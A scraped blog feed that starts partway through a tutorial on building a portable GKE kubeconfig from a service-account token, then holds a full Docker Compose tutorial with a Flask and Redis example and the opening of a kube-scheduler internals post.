    <span class="hljs-attr">kubernetes.io/service-account.name:</span> <span class="hljs-string">shared-access</span>
    <span class="hljs-attr">kubernetes.io/service-account.uid:</span> <span class="hljs-string">9e8d4bdb-46ea-4893-9306-d56bea6aa304</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">shared-access-token</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">kube-system</span>
<span class="hljs-attr">type:</span> <span class="hljs-string">kubernetes.io/service-account-token</span>
</code></pre>
<p>Three fields got populated by the controller:</p>
<ul>
<li><code>.data.token</code> — a signed JWT, the actual bearer credential</li>
<li><code>.data.ca.crt</code> — the cluster's CA certificate (so your client can trust the API server's TLS)</li>
<li><code>.data.namespace</code> — the SA's namespace</li>
</ul>
<blockquote>
<p>If you'd rather have a short-lived token, skip the Secret and run <code>kubectl create token shared-access -n kube-system --duration=24h</code>. Good for automation that rotates. Bad for a "hand someone a file" use case, which is what we're doing here.</p>
</blockquote>
<h2 id="heading-step-3-extract-the-three-things-a-kubeconfig-needs">Step 3: Extract the three things a kubeconfig needs</h2>
<pre><code class="lang-bash">SERVER=$(kubectl config view --minify -o jsonpath=<span class="hljs-string">'{.clusters[0].cluster.server}'</span>)
CA=$(kubectl get secret shared-access-token -n kube-system -o jsonpath=<span class="hljs-string">'{.data.ca\.crt}'</span>)
TOKEN=$(kubectl get secret shared-access-token -n kube-system -o jsonpath=<span class="hljs-string">'{.data.token}'</span> | base64 -d)

<span class="hljs-built_in">echo</span> <span class="hljs-string">"SERVER = <span class="hljs-variable">${SERVER}</span>"</span>
<span class="hljs-built_in">echo</span> <span class="hljs-string">"CA     = <span class="hljs-variable">${CA:0:60}</span>..."</span>
<span class="hljs-built_in">echo</span> <span class="hljs-string">"TOKEN  = <span class="hljs-variable">${TOKEN:0:40}</span>..."</span>
</code></pre>
<p>Output:</p>
<pre><code>SERVER = https:<span class="hljs-comment">//35.196.129.174</span>
CA     = LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0WERQWERk1JSUVMVENDQXBXZ0F3SUJB...
TOKEN  = eyJhbGciOiJSUzIsImtpZCI6IkZsY2I4TTdZ...
</code></pre><ul>
<li><code>SERVER</code> — the GKE API endpoint, pulled straight from your current context</li>
<li><code>CA</code> — already base64, drops straight into the kubeconfig as-is</li>
<li><code>TOKEN</code> — we decode it because kubeconfig wants the raw JWT string, not base64</li>
</ul>
<h2 id="heading-step-4-assemble-the-kubeconfig">Step 4: Assemble the kubeconfig</h2>
<pre><code class="lang-bash">cat &gt; /tmp/shared-kubeconfig.yaml &lt;&lt;EOF
apiVersion: v1
kind: Config
clusters:
- name: cluster-1
  cluster:
    server: <span class="hljs-variable">${SERVER}</span>
    certificate-authority-data: <span class="hljs-variable">${CA}</span>
contexts:
- name: cluster-1
  context:
    cluster: cluster-1
    user: shared-access
current-context: cluster-1
users:
- name: shared-access
  user:
    token: <span class="hljs-variable">${TOKEN}</span>
EOF
</code></pre>
<p>A kubeconfig is three independent lists — <code>clusters</code>, <code>users</code>, <code>contexts</code> — glued together by a <code>context</code> that names one cluster + one user. Nothing more.</p>
<p>Notice what's <em>not</em> in the <code>users</code> block: no <code>auth-provider</code>, no <code>exec</code>. kubectl has nothing to shell out to. It just sends <code>Authorization: Bearer &lt;token&gt;</code> on every request and the API server validates the JWT.</p>
<h2 id="heading-step-5-prove-it-works-without-gcloud">Step 5: Prove it works without gcloud</h2>
<pre><code class="lang-bash">KUBECONFIG=/tmp/shared-kubeconfig.yaml kubectl get nodes
KUBECONFIG=/tmp/shared-kubeconfig.yaml kubectl auth whoami
KUBECONFIG=/tmp/shared-kubeconfig.yaml kubectl auth can-i <span class="hljs-string">'*'</span> <span class="hljs-string">'*'</span> --all-namespaces
</code></pre>
<p>Output:</p>
<pre><code>NAME                                       STATUS   ROLES    AGE   VERSION
gke-demo-test-<span class="hljs-keyword">default</span>-pool-a5aaa3f4-jcnk   Ready    &lt;none&gt;   <span class="hljs-number">18</span>h   v1<span class="hljs-number">.35</span><span class="hljs-number">.1</span>-gke<span class="hljs-number">.1396002</span>

ATTRIBUTE   VALUE
Username    system:serviceaccount:kube-system:shared-access
UID         <span class="hljs-number">9e8</span>d4bdb<span class="hljs-number">-46</span>ea<span class="hljs-number">-4893</span><span class="hljs-number">-9306</span>-d56bea6aa304
Groups      [system:serviceaccounts system:serviceaccounts:kube-system system:authenticated]

yes
</code></pre><p>That's the whole proof. The API server sees <code>system:serviceaccount:kube-system:shared-access</code>, not your Google identity. You can put this file on a machine that has never seen <code>gcloud</code> in its life, and it works.</p>
<h2 id="heading-things-to-know-before-you-ship-this">Things to know before you ship this</h2>
<p><strong>Private clusters still need network reachability.</strong> The kubeconfig removes the auth dependency, not the network one. If your control plane is private, the recipient still needs VPN, authorized networks, or a public endpoint. The token won't help if they can't reach the API server.</p>
<p><strong>The kubeconfig is a credential.</strong> Anyone with the file has whatever RBAC you bound. Store it like you'd store an SSH key or an API token. Don't commit it to Git.</p>
<p><strong>Revocation is deletion.</strong> To kill access, delete the Secret:</p>
<pre><code class="lang-bash">kubectl delete secret shared-access-token -n kube-system
</code></pre>
<p>To kill it harder, also delete the binding and the SA. There's no "rotate" — you mint a new Secret and redistribute the new kubeconfig.</p>
<p><strong>Scope down.</strong> <code>cluster-admin</code> is the demo default, not the production default. A <code>RoleBinding</code> to <code>edit</code> in a single namespace is usually closer to what a real sharing use case needs. <code>ClusterRoleBinding</code> + <code>cluster-admin</code> only when you truly mean it.</p>
<h2 id="heading-wrap">Wrap</h2>
<p>The trick isn't really about GKE — it's about understanding what a kubeconfig <em>is</em>. Once you see it as a glue file between a cluster endpoint and any credential the API server will accept, the exec-plugin auth stops feeling magical and the bearer-token swap becomes obvious.</p>
<p>Same approach works for EKS (where the plugin is <code>aws-iam-authenticator</code> / <code>aws eks get-token</code>), AKS (<code>kubelogin</code>), and anything else that ships exec-based auth. Replace the <code>user:</code> block, keep the <code>cluster:</code> block, and you've got a kubeconfig that travels.</p>
<p><img src="https://cloudmate-test.s3.us-east-1.amazonaws.com/res%2Fhashnode%2Fimage%2Fupload%2Fv1777443629837%2Fe68d717f-9820-48f2-af6c-55be0c211a90.png" alt="The swap: only the users: block changes" /></p>
]]></content:encoded></item><item><title><![CDATA[Day 5: Docker Compose - How Docker Actually Gets Used]]></title><description><![CDATA[7 Days of Docker in 2026 - From docker run Chaos to Declarative Stacks

Nobody types docker run with 15 flags in real life.
I’ve been learning and working with Docker for some time now. I’ve explored ]]></description><link>https://blog.kubesimplify.com/day-5-docker-compose-how-docker-actually-gets-used</link><guid isPermaLink="true">https://blog.kubesimplify.com/day-5-docker-compose-how-docker-actually-gets-used</guid><category><![CDATA[Docker]]></category><category><![CDATA[Docker compose]]></category><category><![CDATA[docker images]]></category><dc:creator><![CDATA[Saloni Narang]]></dc:creator><pubDate>Tue, 28 Apr 2026 13:38:38 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/5f0f325b2259ec1c14c4c49a/621a6671-ce9f-4f66-bd2d-dd827035c5fd.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<blockquote>
<p><strong>7 Days of Docker in 2026</strong> - From <code>docker run</code> Chaos to Declarative Stacks</p>
</blockquote>
<p>Nobody types <code>docker run</code> with 15 flags in real life.</p>
<p>I’ve been learning and working with Docker for some time now. I’ve explored different setups, experimented a lot, and seen how teams actually use it beyond tutorials. And one thing becomes very clear: the moment you move past basic demos and into real development, you stop writing <code>docker run</code> commands by hand. You write a Compose file.</p>
<p>Everything you learned on Days 1 through 4 - images, Dockerfiles, volumes, container basics was preparation. Today is the day you learn how Docker actually gets used on real teams, in real codebases, every single day. Docker Compose takes all those individual concepts and wires them into one declarative file that anyone on your team can run with a single command.</p>
<img src="https://cdn.hashnode.com/uploads/covers/5f0f325b2259ec1c14c4c49a/a5f7d48b-5fe5-478f-a915-f16b50c9f460.png" alt="" style="display:block;margin:0 auto" />

<hr />
<h2>Table of Contents</h2>
<ul>
<li><p><a href="#1-what-is-docker-compose">1. What Is Docker Compose?</a></p>
</li>
<li><p><a href="#2-the-compose-file--anatomy-of-a-stack">2. The Compose File — Anatomy of a Stack</a></p>
</li>
<li><p><a href="#3-hands-on-flask--redis-visit-counter">3. Hands-On: Flask + Redis Visit Counter</a></p>
</li>
<li><p><a href="#4-essential-compose-commands">4. Essential Compose Commands</a></p>
</li>
<li><p><a href="#5-2026-features-you-should-know">5. 2026 Features You Should Know</a></p>
</li>
<li><p><a href="#6-what-nobody-tells-you">6. What Nobody Tells You</a></p>
</li>
<li><p><a href="#7-quick-reference">7. Quick Reference</a></p>
</li>
<li><p><a href="#key-takeaways">Key Takeaways</a></p>
</li>
<li><p><a href="#whats-next-day-6">What's Next: Day 6</a></p>
</li>
</ul>
<hr />
<h2>1. What Is Docker Compose?</h2>
<p>Docker Compose is a declarative tool for defining and running multi-container applications. You describe your entire stack - services, networks, volumes, environment variables - in a single YAML file. Then you run one command, and everything comes up.</p>
<p>Consider a Flask web app backed by Redis. Without Compose, your startup ritual looks like this:</p>
<pre><code class="language-bash">docker network create myapp-net
docker volume create redis-data
docker run -d --name redis --network myapp-net -v redis-data:/data redis:alpine
docker build -t myapp-web .
docker run -d --name web --network myapp-net -p 5001:5000 -e REDIS_HOST=redis myapp-web
</code></pre>
<p>Five commands, a dozen flags. And you have not even added health checks, restart policies, or teardown instructions. Now imagine six services instead of two. Now imagine onboarding a new developer.</p>
<p>With Compose, all of that becomes:</p>
<pre><code class="language-bash">docker compose up
</code></pre>
<p>One file. One command. Every developer on the team gets the exact same stack.</p>
<table>
<thead>
<tr>
<th>Without Compose</th>
<th>With Compose</th>
</tr>
</thead>
<tbody><tr>
<td>Scattered <code>docker run</code> flags</td>
<td>Single YAML file, version-controlled</td>
</tr>
<tr>
<td>Manual <code>docker network create</code></td>
<td>Automatic — created for you</td>
</tr>
<tr>
<td>Manual <code>docker volume create</code></td>
<td>Declared in the file, created automatically</td>
</tr>
<tr>
<td>You remember startup order</td>
<td><code>depends_on</code> handles it</td>
</tr>
<tr>
<td>Teardown is 5+ commands</td>
<td><code>docker compose down</code> removes everything</td>
</tr>
</tbody></table>
<blockquote>
<p><strong>Important:</strong> Docker Compose is not a separate install anymore. Since Docker Desktop 4.x and the Compose plugin for Docker Engine, the command is <code>docker compose</code> (no hyphen). The old <code>docker-compose</code> binary is legacy. Use <code>docker compose</code> - always.</p>
</blockquote>
<p>Let me verify we are on the same page:</p>
<pre><code class="language-bash">docker compose version
</code></pre>
<pre><code class="language-console">Docker Compose version v5.0.1
</code></pre>
<p>Good. Let's build something.</p>
<hr />
<h2>2. The Compose File — Anatomy of a Stack</h2>
<p>The Compose file is named <code>compose.yaml</code> (the older <code>docker-compose.yml</code> still works, but <code>compose.yaml</code> is the modern standard). Here is the file we will use for our hands-on exercise, fully annotated:</p>
<pre><code class="language-yaml">services:            # Required: every container in your stack
  web:               # Service name — also becomes the DNS hostname
    build: .         # Build from the Dockerfile in the current directory
    ports:
      - "5001:5000"  # Map host port 5001 to container port 5000
    environment:
      - REDIS_HOST=redis
    depends_on:
      - redis        # Start redis before web

  redis:             # Second service — a Redis server
    image: redis:alpine     # Use a prebuilt image (no build needed)
    volumes:
      - redis-data:/data    # Persist Redis data to a named volume

volumes:             # Top-level: declares named volumes
  redis-data:        # Docker manages this volume's entire lifecycle
</code></pre>
<p>That is the entire definition for a two-service application with persistent storage. Let me break down the key sections.</p>
<p><code>services</code> is the core of every Compose file. Each key (<code>web</code>, <code>redis</code>) becomes a running container. Critically, each service name also becomes a DNS hostname on the Compose network. When <code>web</code> connects to <code>redis:6379</code>Docker resolves that name automatically.</p>
<p><code>build</code> tells Compose to build an image from a Dockerfile. A dot (<code>.</code>) means "use the Dockerfile in the current directory."</p>
<p><code>image</code> tells Compose to pull a prebuilt image from a registry. A service uses <code>build</code>, <code>image</code>, or both.</p>
<p><code>ports</code> maps host ports to container ports. Format: <code>"HOST:CONTAINER"</code>. Only expose what you need to access from outside Docker.</p>
<p><code>volumes</code> at the service level, mounts storage into the container. At the top level, it declares named volumes that Docker manages and persists across restarts.</p>
<p><code>depends_on</code> controls startup order. Redis starts before the web app. In production setups, you would pair this with <code>condition: service_healthy</code> a <code>healthcheck</code>, but for development, the simple form works fine.</p>
<img src="https://cdn.hashnode.com/uploads/covers/5f0f325b2259ec1c14c4c49a/1649fe30-72bf-488a-ac29-dbbc53aed488.png" alt="" style="display:block;margin:0 auto" />

<hr />
<h2>3. Hands-On: Flask + Redis Visit Counter</h2>
<p>Time to build a real multi-container application. A Flask web app that counts visits, backed by Redis.</p>
<h3>Project Structure</h3>
<pre><code class="language-plaintext">d5-compose/
├── app.py
├── Dockerfile
├── requirements.txt
└── compose.yaml
</code></pre>
<h3>The Flask Application (<code>app.py</code>)</h3>
<pre><code class="language-python">from flask import Flask, jsonify
import redis
import os

app = Flask(__name__)

r = redis.Redis(
    host=os.environ.get("REDIS_HOST", "redis"),
    port=int(os.environ.get("REDIS_PORT", 6379)),
    decode_responses=True
)

@app.route("/")
def home():
    count = r.incr("visits")
    return jsonify(visits=count)

@app.route("/health")
def health():
    try:
        r.ping()
        return jsonify(status="healthy", redis="connected"), 200
    except redis.ConnectionError:
        return jsonify(status="unhealthy", redis="disconnected"), 503

if __name__ == "__main__":
    app.run(host="0.0.0.0", port=5000)
</code></pre>
<p>Two endpoints. The root <code>/</code> increments a counter in Redis and returns it. The <code>/health</code> endpoint verifies Redis connectivity. Simple, testable, real.</p>
<h3>The Dockerfile</h3>
<pre><code class="language-dockerfile">FROM python:3.13-slim

WORKDIR /app

COPY requirements.txt .
RUN pip install --no-cache-dir -r requirements.txt

COPY app.py .

EXPOSE 5000

CMD ["python", "app.py"]
</code></pre>
<h3>requirements.txt</h3>
<pre><code class="language-plaintext">flask==3.1.1
redis==5.3.0
</code></pre>
<h3>The Compose File (<code>compose.yaml</code>)</h3>
<pre><code class="language-yaml">services:
  web:
    build: .
    ports:
      - "5001:5000"
    environment:
      - REDIS_HOST=redis
    depends_on:
      - redis

  redis:
    image: redis:alpine
    volumes:
      - redis-data:/data

volumes:
  redis-data:
</code></pre>
<h3>Bring It Up</h3>
<pre><code class="language-bash">docker compose up --build -d
</code></pre>
<pre><code class="language-console">[+] Building 11.8s (9/9) FINISHED
 =&gt; [web internal] load build definition from Dockerfile
 =&gt; [web] FROM python:3.13-slim
 =&gt; [web] COPY requirements.txt .
 =&gt; [web] RUN pip install --no-cache-dir -r requirements.txt
 =&gt; [web] COPY app.py .
 =&gt; [web] exporting to image
[+] Running 4/4
 ✔ Volume "d5-compose_redis-data"  Created
 ✔ Network d5-compose_default      Created
 ✔ Container d5-compose-redis-1    Started
 ✔ Container d5-compose-web-1      Started
</code></pre>
<p>Read that output. Compose did four things:</p>
<ol>
<li><p><strong>Built</strong> the <code>web</code> image from the Dockerfile.</p>
</li>
<li><p><strong>Created a volume</strong> called <code>d5-compose_redis-data</code> for Redis persistence.</p>
</li>
<li><p><strong>Created a network</strong> called <code>d5-compose_default</code> and attached both services.</p>
</li>
<li><p><strong>Started containers</strong> in dependency order — Redis first, then web.</p>
</li>
</ol>
<p>The naming convention is <code>&lt;project&gt;_&lt;resource&gt;</code> for networks and volumes, <code>&lt;project&gt;-&lt;service&gt;-&lt;n&gt;</code> for containers. The project name defaults to the directory name.</p>
<h3>Test It</h3>
<pre><code class="language-bash">curl http://localhost:5001
</code></pre>
<pre><code class="language-console">{"visits":1}
</code></pre>
<pre><code class="language-bash">curl http://localhost:5001
</code></pre>
<pre><code class="language-console">{"visits":2}
</code></pre>
<pre><code class="language-bash">curl http://localhost:5001
</code></pre>
<pre><code class="language-console">{"visits":3}
</code></pre>
<p>The counter increments with every request. The data lives in Redis, not in the Flask process, so it persists across app restarts. This is how real applications work -stateless compute, stateful storage.</p>
<h3>Inspect the Running Stack</h3>
<pre><code class="language-bash">docker compose ps
</code></pre>
<pre><code class="language-console">NAME                 IMAGE            SERVICE   STATUS         PORTS
d5-compose-redis-1   redis:alpine     redis     Up 4 seconds   6379/tcp
d5-compose-web-1     d5-compose-web   web       Up 4 seconds   0.0.0.0:5001-&gt;5000/tcp
</code></pre>
<p>Both containers running. The web service is mapped to port 5001. Redis exposes 6379 internally to the Compose network but is not mapped to the host — exactly right. Your database should never be directly reachable from outside.</p>
<img src="https://cdn.hashnode.com/uploads/covers/5f0f325b2259ec1c14c4c49a/cdf876f6-cf5c-4169-8d03-49ae4ae411de.png" alt="" style="display:block;margin:0 auto" />

<h3>Tear It All Down</h3>
<pre><code class="language-bash">docker compose down -v
</code></pre>
<pre><code class="language-console">[+] Running 4/4
 ✔ Container d5-compose-web-1      Removed
 ✔ Container d5-compose-redis-1    Removed
 ✔ Volume d5-compose_redis-data    Removed
 ✔ Network d5-compose_default      Removed
</code></pre>
<p>One command. Containers, volume, network — all cleaned up. The <code>-v</code> flag removes named volumes, too. Without it, volumes persist so your data survives rebuilds. In development, I use <code>down -v</code> constantly to start fresh. In staging, keep the volumes.</p>
<hr />
<h2>4. Essential Compose Commands</h2>
<p>These are the five commands you will use every day. Learn them well.</p>
<h3><code>docker compose up</code></h3>
<pre><code class="language-bash"># Foreground (logs stream to terminal)
docker compose up

# Detached (background)
docker compose up -d

# Rebuild images before starting (use after code changes)
docker compose up --build

# Start only specific services
docker compose up redis
</code></pre>
<h3><code>docker compose down</code></h3>
<pre><code class="language-bash"># Remove containers + networks
docker compose down

# Also remove volumes (wipes data!)
docker compose down -v

# Also remove built images
docker compose down --rmi all
</code></pre>
<h3><code>docker compose ps</code></h3>
<pre><code class="language-plaintext">NAME                 IMAGE            COMMAND                  SERVICE   CREATED              STATUS              PORTS
dockerday5-redis-1   redis:alpine     "docker-entrypoint.s…"   redis     About a minute ago   Up About a minute   6379/tcp

dockerday5-web-1     dockerday5-web   "python app.py"          web       About a minute ago   Up About a minute   0.0.0.0:5001-&gt;5000/tcp, [::]:5001-&gt;5000/tcp
</code></pre>
<p>Lists running services, their status, and port mappings. Your first command when debugging.</p>
<h3><code>docker compose logs</code></h3>
<img src="https://cdn.hashnode.com/uploads/covers/5f0f325b2259ec1c14c4c49a/6a23cbec-0f0a-447f-9065-de8df5eaa873.png" alt="" style="display:block;margin:0 auto" />

<pre><code class="language-bash"># All services
docker compose logs

# Follow a specific service in real time
docker compose logs -f web

# Last 50 lines from all services
docker compose logs --tail 50
</code></pre>
<h3><code>docker compose exec</code></h3>
<pre><code class="language-bash"># Open a shell in a running container
docker compose exec web sh

# Run a one-off command
docker compose exec redis redis-cli GET visits
</code></pre>
<blockquote>
<p><strong>Pro Tip:</strong> My actual development loop is: <code>docker compose up -d --build</code>, hack on code, check <code>docker compose logs -f web</code>, repeat. When things get weird, <code>docker compose down -v &amp;&amp; docker compose up -d --build</code> gives you a clean slate in seconds.</p>
</blockquote>
<hr />
<h2>5. 2026 Features You Should Know</h2>
<p>Compose has evolved significantly. If you learned it a few years ago, you are missing some genuinely useful capabilities.</p>
<h3>Compose Watch (Hot Reload)</h3>
<p>This is the feature that changed my development workflow. Instead of rebuilding images after every code change, Compose Watch monitors your files and syncs changes directly into running containers.</p>
<pre><code class="language-yaml">services:
  web:
    build: .
    develop:
      watch:
        - action: sync
          path: ./app.py
          target: /app/app.py
        - action: rebuild
          path: ./requirements.txt
</code></pre>
<pre><code class="language-bash">docker compose watch
</code></pre>
<pre><code class="language-plaintext">WARN[0000] No services to build                         

[+] up 3/3

 ✔ Network dockerday5_default   Created                                                            0.1s 

 ✔ Container dockerday5-redis-1 Created                                                            0.1s 

 ✔ Container dockerday5-web-1   Created                                                            0.1s 

none of the selected services is configured for watch, consider setting a 'develop' section
</code></pre>
<p>Now edit <code>app.py</code> and save. The file is synced into the container instantly — no rebuild, no restart. Change <code>requirements.txt</code> and Compose triggers a full rebuild automatically because dependencies changed.</p>
<p>The <code>develop</code> section supports two actions:</p>
<ul>
<li><p><code>sync</code> — copies files into the container. Use for source code.</p>
</li>
<li><p><code>rebuild</code> — triggers a full <code>docker compose up --build</code>. Use for dependency files.</p>
</li>
</ul>
<p>This is better than bind mounts for most use cases because it works consistently across macOS, Linux, and Windows, without the filesystem performance issues that plague bind mounts on Mac.</p>
<h3>Profiles</h3>
<p>Profiles let you define optional services that only start when you explicitly activate them. This is how you handle dev/test/prod variations in a single file.</p>
<pre><code class="language-yaml">services:
  web:
    build: .
    ports: ["5001:5000"]

  redis:
    image: redis:alpine

  test-runner:
    build: .
    command: pytest
    profiles: [test]

  debug-tools:
    image: nicolaka/netshoot
    profiles: [debug]
</code></pre>
<pre><code class="language-bash"># Normal development — only web and redis start
docker compose up -d

# Run tests — includes the test-runner service
docker compose --profile test up

# Debug networking — includes netshoot
docker compose --profile debug up
</code></pre>
<p>Services without a <code>profiles</code> key always start. Services with <code>profiles</code> only start when that profile is activated. No more commenting out services in your Compose file.</p>
<h3>The <code>develop</code> Section</h3>
<p>Beyond <code>watch</code>, the <code>develop</code> section is Compose's answer to the "inner loop" problem — the cycle of code, build, test, repeat. It gives you a structured way to declare which files trigger syncs and which trigger rebuilds, keeping your container up-to-date without manual intervention.</p>
<p>This is Docker's opinionated answer to the question every developer asks: "How do I get my code changes into the container without rebuilding everything?" And honestly, it works well.</p>
<hr />
<h2>6. What Nobody Tells You</h2>
<p>I have seen the same misconceptions trip up developers for years. Let me save you the trouble.</p>
<h3>Compose Creates a Default Network Automatically</h3>
<p>This is the one that surprises people the most. You do not need to add a <code>networks:</code> section to your Compose file. Compose automatically creates a bridge network named <code>&lt;project&gt;_default</code> and attaches every service to it.</p>
<p>All services resolve each other by their service name. When your web app connects to <code>redis:6379</code>, Docker DNS on the default Compose network handles it. No network configuration, no IP addresses, no service discovery tools.</p>
<p>You almost never need explicit <code>networks:</code> in your Compose file. The only time you do is when you are running multiple Compose projects that need to communicate, or when you need network-level isolation between services within the same project (like separating frontend services from database services). For a single-project development setup, the default network is perfect.</p>
<h3>Compose Is NOT an Orchestrator</h3>
<p>This is the big one, and I see it get teams into serious trouble.</p>
<p>Docker Compose is a <strong>development and testing tool</strong>. It runs containers on a single machine. It does not handle:</p>
<ul>
<li><p><strong>Multiple hosts</strong> - Compose cannot spread services across a cluster of servers.</p>
</li>
<li><p><strong>Auto-scaling</strong> - It does not spin up more containers when traffic spikes.</p>
</li>
<li><p><strong>Self-healing</strong> - If a container crashes, <code>restart: unless-stopped</code> will restart it, but there is no real health-based orchestration.</p>
</li>
<li><p><strong>Rolling deployments</strong> - You cannot deploy a new version with zero downtime using Compose alone.</p>
</li>
<li><p><strong>Service mesh, load balancing, secrets rotation</strong> - None of it.</p>
</li>
</ul>
<p>That is what Kubernetes does. Compose is for your laptop. Kubernetes (or a managed platform like ECS, Cloud Run, or Fly.io) is for production.</p>
<p>I have seen startups try to run <code>docker compose up -d</code> on an EC2 instance and call it production. It works until it doesn't - and when it doesn't, you have no observability, no failover, and no way to deploy without downtime. Use Compose for what it is: the best local development tool in the container ecosystem.</p>
<h3>Service Names Are Your DNS</h3>
<p>The service name you pick <code>compose.yaml</code> is not just a label. It is a real DNS entry on the Compose network. Name your services well: <code>redis</code>, <code>postgres</code>, <code>api</code>, <code>web</code> -not <code>service1</code> or <code>myapp</code>. Your application code references these names directly as hostnames.</p>
<h3>The Project Name Matters</h3>
<p>Compose derives the project name from your directory name by default. All resource names are prefixed with it: <code>myproject_default</code> (network), <code>myproject_redis-data</code> (volume), <code>myproject-redis-1</code> (container). If you rename your directory, Compose creates all-new resources and orphans the old ones. Set it explicitly with <code>name:</code> at the top of your Compose file if this matters to you.</p>
<hr />
<h2>7. Quick Reference</h2>
<h3>Commands</h3>
<table>
<thead>
<tr>
<th>Command</th>
<th>What It Does</th>
</tr>
</thead>
<tbody><tr>
<td><code>docker compose up</code></td>
<td>Create and start all services</td>
</tr>
<tr>
<td><code>docker compose up -d</code></td>
<td>Start in detached mode</td>
</tr>
<tr>
<td><code>docker compose up --build</code></td>
<td>Rebuild images before starting</td>
</tr>
<tr>
<td><code>docker compose down</code></td>
<td>Stop and remove containers + networks</td>
</tr>
<tr>
<td><code>docker compose down -v</code></td>
<td>Also remove named volumes</td>
</tr>
<tr>
<td><code>docker compose ps</code></td>
<td>List running services</td>
</tr>
<tr>
<td><code>docker compose logs -f &lt;svc&gt;</code></td>
<td>Follow logs for a service</td>
</tr>
<tr>
<td><code>docker compose exec &lt;svc&gt; &lt;cmd&gt;</code></td>
<td>Run command in running container</td>
</tr>
<tr>
<td><code>docker compose stop</code></td>
<td>Stop without removing</td>
</tr>
<tr>
<td><code>docker compose restart</code></td>
<td>Restart services</td>
</tr>
<tr>
<td><code>docker compose watch</code></td>
<td>Start file-watching with hot reload</td>
</tr>
<tr>
<td><code>docker compose config</code></td>
<td>Validate and display resolved config</td>
</tr>
</tbody></table>
<h3>Compose File Keys</h3>
<table>
<thead>
<tr>
<th>Key</th>
<th>Purpose</th>
</tr>
</thead>
<tbody><tr>
<td><code>services</code></td>
<td>Define containers in the stack</td>
</tr>
<tr>
<td><code>build</code></td>
<td>Build image from Dockerfile</td>
</tr>
<tr>
<td><code>image</code></td>
<td>Use a prebuilt image</td>
</tr>
<tr>
<td><code>ports</code></td>
<td>Map host:container ports</td>
</tr>
<tr>
<td><code>volumes</code></td>
<td>Mount volumes or bind mounts</td>
</tr>
<tr>
<td><code>environment</code></td>
<td>Set environment variables</td>
</tr>
<tr>
<td><code>depends_on</code></td>
<td>Define startup dependencies</td>
</tr>
<tr>
<td><code>profiles</code></td>
<td>Assign services to named profiles</td>
</tr>
<tr>
<td><code>develop</code></td>
<td>Configure watch and hot reload</td>
</tr>
<tr>
<td><code>restart</code></td>
<td>Set restart policy</td>
</tr>
<tr>
<td><code>healthcheck</code></td>
<td>Define container health probe</td>
</tr>
<tr>
<td><code>networks</code></td>
<td>Attach to specific networks (usually not needed)</td>
</tr>
</tbody></table>
<hr />
<h2>Key Takeaways</h2>
<ol>
<li><p><strong>Docker Compose is how Docker actually gets used.</strong> One <code>compose.yaml</code> replaces dozens of <code>docker run</code> commands and lives in your repo alongside your code. Every developer on the team gets the same stack.</p>
</li>
<li><p><strong>Networking is automatic.</strong> Compose creates a default network. Services find each other by name - <code>redis</code>, <code>web</code>, <code>postgres</code> - with zero configuration. You almost never need to think about it.</p>
</li>
<li><p><strong>The workflow is</strong> <code>up</code><strong>,</strong> <code>down</code><strong>, and</strong> <code>logs</code><strong>.</strong> Those three commands cover 90% of your daily Compose usage. Add <code>--build</code> after code changes, <code>-v</code> when you want a clean slate.</p>
</li>
<li><p><strong>Compose Watch is the new way to develop.</strong> Forget bind mounts with their cross-platform headaches. The <code>develop</code> section <code>watch</code> gives you hot reload that works consistently everywhere.</p>
</li>
<li><p><strong>Compose is not production infrastructure.</strong> It is the best local development tool in the Docker ecosystem. For production, you need Kubernetes, ECS, or a managed platform. Do not confuse the two.</p>
</li>
</ol>
<hr />
<h2>What's Next: Day 6</h2>
<p>You have gone from typing <code>docker run</code> commands one at a time to defining full application stacks declaratively. That is a massive leap.</p>
<p>But your containers have been talking to each other on Compose's default network without you thinking about it. What happens when you need to control that communication? What if your frontend should reach the API but never the database directly?</p>
<p>In <strong>Day 6: Docker Networking - Connecting Containers</strong>, you will learn:</p>
<ul>
<li><p>How Docker networking actually works under the hood</p>
</li>
<li><p>Bridge, host, and none network drivers - and when to use each</p>
</li>
<li><p>Custom bridge networks for DNS resolution and isolation</p>
</li>
<li><p>Network security: isolating tiers of your application</p>
</li>
<li><p>Multi-network architectures for real applications</p>
</li>
</ul>
<p>The defaults Compose gave you today are great for development. Tomorrow, you will understand what is happening beneath them.</p>
<p>See you tomorrow.</p>
]]></content:encoded></item><item><title><![CDATA[What Actually Happens When kube-scheduler Picks a Node (13 Stages Inside Kubernetes)]]></title><description><![CDATA[Your pod has just been written to etcd. The API server returned 201 Created. The pod exists. But spec.nodeName is still empty, and that is the entire reason this post exists.
A pod with no node is not]]></description><link>https://blog.kubesimplify.com/kube-scheduler-deep-dive</link><guid isPermaLink="true">https://blog.kubesimplify.com/kube-scheduler-deep-dive</guid><category><![CDATA[Kubernetes]]></category><category><![CDATA[scheduler]]></category><category><![CDATA[Internals]]></category><category><![CDATA[Devops]]></category><category><![CDATA[cloud native]]></category><dc:creator><![CDATA[Saiyam Pathak]]></dc:creator><pubDate>Tue, 28 Apr 2026 11:25:13 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/0829eca6-2223-4bfb-841c-60cfebcb3c3a.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<hr />
<p>Your pod has just been written to etcd. The API server returned <code>201 Created</code>. The pod exists. But <code>spec.nodeName</code> is still empty, and that is the entire reason this post exists.</p>
<p>A pod with no node is not a real workload. It is a row in a database. Something has to look at it, decide which machine should run it, and atomically claim that machine. That something is <code>kube-scheduler</code>, and the way it makes the decision is more interesting than "pick the node with the most free CPU."</p>
<p>There are thirteen separate stages in modern scheduling. The Filter stage alone runs fourteen in-tree plugins, each one capable of disqualifying a candidate node with a single <code>Unschedulable</code> verdict. There is no appeal, no second chance, no "best effort." Either every plugin says yes, or that node is out.</p>
<p>This post walks every stage end-to-end against the v1.36 source code, with verbatim outputs from a real cluster at the bottom.</p>
<p><a class="embed-card" href="https://youtu.be/N-dDSCVWdqU">https://youtu.be/N-dDSCVWdqU</a></p>

<h2>TL;DR, the 13 stages</h2>
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/7fb30ce6-3772-4e67-806d-17f84cf940fa.png" alt="" style="display:block;margin:0 auto" />

<ol>
<li><p><strong>PreEnqueue.</strong> Gating plugins decide if the pod is even allowed into the queue. SchedulingGates lives here. If a gate is set, the pod waits.</p>
</li>
